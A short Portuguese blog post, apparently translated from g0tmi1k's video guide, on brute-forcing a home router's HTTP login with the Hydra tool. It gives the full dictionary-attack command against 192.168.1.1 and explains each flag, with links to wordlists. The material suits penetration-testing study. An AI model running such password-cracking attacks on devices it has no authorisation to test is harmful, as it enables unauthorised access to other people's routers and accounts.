sábado, 31 de março de 2012

[Video] Quebrando Senha via HTTP com (Hydra)



Links
Veja On-line: Cracking HTTP Passwords (Hydra)
Download do video: g0tmi1k - Hydra [HD].mp4 - crack,, http,, password,, hydra,, g0tmi1k
Comandos: Bash | hydra -l admin -P /pentest/pas - G0tmi1k - f5f5a18f2 - Pastebin.com

O que é isso?
Um guia básico de como usar hydra para quebrar a senha via http de um roteador doméstico

Como funciona?
Use um ataque de dicionário para testar falhas ou senhas simples uma a uma ou em clientes remotos.

O que é preciso?
- Hydra
- Dicionario Grande (wordlist)

Software
Nome: Hydra
Versão: 5.4
Site: #!/bin/the hacker's choice - THC
Download: The Hacker's Choice Download

Comandos:
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /

-l = login
-P = senha (veja na wordlist)
-e ns = verifica por senhas "vazias"
-t xx= Quanto tarefas são executadas por vez
-f = sair, caso uma vez encontre no 1 login/senha
-s = conectar via SSL
-vV = verbose mode (exibe mais informações)
192.168.1.1 = endereço IP
http-get = O que quebrar/metodo etc
/ = Pagina para quebra - root

Notas:
Foi cortado meu final do video chamado "g0tmi1k's home network".
A senha HAS para ser usada no dicionario, você pode encontrar algo em http://grc.com/pass, as chances de que ele quebre é próximo a nada!

Video tamanho: 01:21
Captura tamanho: 01:40
Musica: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)

Blog Post: [Video] How to: Crack HTTP passwords (hydra)

Dicionários: ISOs and Dictionaries

Nota:

0 comentários:

Postar um comentário

Proibido palavras ofensivas, racistas ou descriminatórias.

[Seu Comentário será liberado no máximo em 24horas]